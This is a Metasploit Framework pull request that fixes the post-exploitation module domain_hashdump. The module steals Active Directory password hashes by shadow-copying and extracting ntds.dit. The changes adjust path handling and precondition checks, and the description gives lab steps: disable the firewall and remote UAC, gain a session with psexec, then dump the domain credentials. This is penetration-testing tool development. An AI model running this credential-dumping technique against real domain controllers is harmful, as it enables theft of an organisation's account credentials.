### PR TITLE
Feature/msp 12867/domain hashdump rfe

### DIFF
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ]
   ))
-    deregister_options('RHOST','SMBUser','SMBPass', 'SMBDomain')
+    deregister_options('SMBUser','SMBPass', 'SMBDomain')
   end
 
   def run
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Post
   def vss_method
     location = ntds_location.dup
     volume = location.slice!(0,3)
-    id = create_shadowcopy("#{volume}\\")
+    id = create_shadowcopy("#{volume}")
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -93,23 +93,18 @@ class Metasploit3 < Msf::Post
 
 
   def preconditions_met?
-    status = true
-    unless is_domain_controller?
-      print_error "This does not appear to be an AD Domain Controller"
-      status = false
-    end
     unless is_admin?
       print_error "This module requires Admin privs to run"
-      status = false
+      return false
     end
-    if is_uac_enabled?
-      print_error "This module requires UAC to be bypassed first"
-      status = false
+    unless is_domain_controller?
+      print_error "This does not appear to be an AD Domain Controller"
+      return false
     end
     unless session_compat?
-      status = false
+      return false
     end
-    return status
+    return true
   end
 
   def repair_ntds(path='')

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -141,10 +141,12 @@ class Metasploit3 < Msf::Post
   end
 
   def vss_method
-    id = create_shadowcopy("#{get_env("%SystemDrive%")}\\")
+    location = ntds_location.dup
+    volume = location.slice!(0,3)
+    id = create_shadowcopy("#{volume}\\")
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
-    sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
+    sc_path = "#{sc_details['DeviceObject']}\\#{location}\\ntds.dit"
     target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Post
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ]
   ))
+    deregister_options('RHOST','SMBUser','SMBPass', 'SMBDomain')
   end
 
   def run


### PR DESCRIPTION
Fixes several of the issues referenced in https://github.com/rapid7/metasploit-framework/issues/5645

The Date String issue looks like it's originating inside Meterpreter itself, and will bear further investigation. This should take care of all the other serious reported issues.

See https://github.com/rapid7/metasploit-framework/pull/5348 for verification steps. Here's one way:
- [x] Windows Server 2008, turn off Windows Firewall, set it up as a domain controller: https://support.cloudshare.com/hc/en-us/articles/200701095-How-to-setup-and-configure-a-Domain-Controller-on-Windows-Server-2008-R2
- [x] Turn off remote UAC: https://support.microsoft.com/en-us/kb/942817 Use method 1, ignore the final part on resealing
- [x] In msfconsole, use psexec, get session. Be sure to set x64 payload if your VM is 64bit.
- [x] use post/windows/gather/credentials/domain_hashdump, set session, run
- [x] Verify domain creds you have on the target are shown by running the creds command
